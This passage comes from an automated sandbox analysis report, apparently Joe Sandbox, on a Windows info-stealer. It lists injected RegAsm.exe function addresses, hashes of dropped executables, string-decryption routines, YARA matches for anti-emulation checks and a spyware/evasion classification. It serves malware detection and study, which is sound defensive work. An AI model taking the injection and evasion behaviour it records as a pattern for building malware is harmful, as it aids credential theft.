Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C132AB0	2_2_6C132AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C22A0	2_2_6C0C22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F4AA0	2_2_6C0F4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DCAB0	2_2_6C0DCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C108AC0	2_2_6C108AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10E2F0	2_2_6C10E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E1AF0	2_2_6C0E1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10D320	2_2_6C10D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C5340	2_2_6C0C5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DC370	2_2_6C0DC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CF380	2_2_6C0CF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1353C8	2_2_6C1353C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24AC30	2_2_6C24AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C236C00	2_2_6C236C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17AC60	2_2_6C17AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CECD0	2_2_6C1CECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C16ECC0	2_2_6C16ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2F8D20	2_2_6C2F8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C23ED70	2_2_6C23ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C29AD50	2_2_6C29AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C174DB0	2_2_6C174DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C206D90	2_2_6C206D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2FCDC0	2_2_6C2FCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C250E20	2_2_6C250E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20EE70	2_2_6C20EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F6E90	2_2_6C1F6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17AEC0	2_2_6C17AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210EC0	2_2_6C210EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C176F10	2_2_6C176F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0F20	2_2_6C2B0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C232F70	2_2_6C232F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1DEF40	2_2_6C1DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B8FB0	2_2_6C2B8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17EFB0	2_2_6C17EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24EFF0	2_2_6C24EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C170FE0	2_2_6C170FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C0820	2_2_6C1C0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FA820	2_2_6C1FA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C244840	2_2_6C244840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2768E0	2_2_6C2768E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C6900	2_2_6C1C6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1A8960	2_2_6C1A8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2009A0	2_2_6C2009A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A9A0	2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2309B0	2_2_6C2309B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C28C9E0	2_2_6C28C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1A49F0	2_2_6C1A49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C228A30	2_2_6C228A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C21EA00	2_2_6C21EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1ECA70	2_2_6C1ECA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1EEA80	2_2_6C1EEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210BA0	2_2_6C210BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C276BE0	2_2_6C276BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FA430	2_2_6C1FA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D4420	2_2_6C1D4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C188460	2_2_6C188460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C29A480	2_2_6C29A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1B64D0	2_2_6C1B64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20A4D0	2_2_6C20A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210570	2_2_6C210570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C8540	2_2_6C1C8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C274540	2_2_6C274540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B8550	2_2_6C2B8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D2560	2_2_6C1D2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1645B0	2_2_6C1645B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C23A5E0	2_2_6C23A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FE5F0	2_2_6C1FE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CC650	2_2_6C1CC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20E6E0	2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1946D0	2_2_6C1946D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CE6E0	2_2_6C1CE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F0700	2_2_6C1F0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C19A7D0	2_2_6C19A7D0
Source: C:\ProgramData\KKJEBAAECB.exe	Code function: 6_2_00C50B3A	6_2_00C50B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043681D	9_2_0043681D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040CC80	9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040C69D	9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E850	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043B050	9_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042D056	9_2_0042D056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042285E	9_2_0042285E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00408870	9_2_00408870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00409810	9_2_00409810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00430035	9_2_00430035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042E8D7	9_2_0042E8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043E080	9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004020AD	9_2_004020AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041F8B7	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00436150	9_2_00436150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420970	9_2_00420970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00415172	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043F9E0	9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042D9EB	9_2_0042D9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00408190	9_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043D9AD	9_2_0043D9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004211B0	9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042C9B7	9_2_0042C9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00405A40	9_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00429A49	9_2_00429A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00426206	9_2_00426206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042BADA	9_2_0042BADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042A2DC	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004122E6	9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042E2AC	9_2_0042E2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420360	9_2_00420360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00411B6E	9_2_00411B6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00424B70	9_2_00424B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401330	9_2_00401330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00427B30	9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004323DD	9_2_004323DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004063E0	9_2_004063E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00407B80	9_2_00407B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040DB90	9_2_0040DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043E390	9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00425B9D	9_2_00425B9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004223B5	9_2_004223B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043DC70	9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00404C20	9_2_00404C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042F4C7	9_2_0042F4C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040D4D0	9_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00435CD0	9_2_00435CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041A4EA	9_2_0041A4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00433D5E	9_2_00433D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040F578	9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040A500	9_2_0040A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042C521	9_2_0042C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420D30	9_2_00420D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00431530	9_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00428535	9_2_00428535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043D5DE	9_2_0043D5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041CDED	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00421DB5	9_2_00421DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042AE2B	9_2_0042AE2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E6C0	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043F6F0	9_2_0043F6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004306F7	9_2_004306F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00406E80	9_2_00406E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00436E82	9_2_00436E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00430EAE	9_2_00430EAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401FC5	9_2_00401FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00404FD0	9_2_00404FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00418FD5	9_2_00418FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00402FE0	9_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004357E0	9_2_004357E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042EF89	9_2_0042EF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043DF90	9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004237A0	9_2_004237A0
Source: C:\ProgramData\KJKJJJECFI.exe	Code function: 10_2_00840B44	10_2_00840B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAC61E0	12_2_1DAC61E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAD3920	12_2_1DAD3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DACD100	12_2_1DACD100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DACFD50	12_2_1DACFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAA9CC0	12_2_1DAA9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAAF8D0	12_2_1DAAF8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAA9430	12_2_1DAA9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAAA2C0	12_2_1DAAA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAD16D0	12_2_1DAD16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39F80	12_2_1DB39F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1AEBE	12_2_1DB1AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39A20	12_2_1DB39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39390	12_2_1DB39390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D954CF0	12_2_1D954CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D977810	12_2_1D977810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D959000	12_2_1D959000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D94EA80	12_2_1D94EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D9566C0	12_2_1D9566C0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\KJKJJJECFI.exe 5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
Source: Joe Sandbox View	Dropped File: C:\ProgramData\KKJEBAAECB.exe 353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2FDAE0 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C1094D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2F09D0 appears 172 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C199B10 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C0FCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C193620 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2FD930 appears 33 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000000.1637407171.0000000000900000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KKJEBAAECB.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KJKJJJECFI.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/39@4/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_6C127030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

2_2_6C127030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_0040FD2A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040F4A5 _EH_prolog,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

2_2_0040F4A5

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\ProgramData\KJKJJJECFI.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2212

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
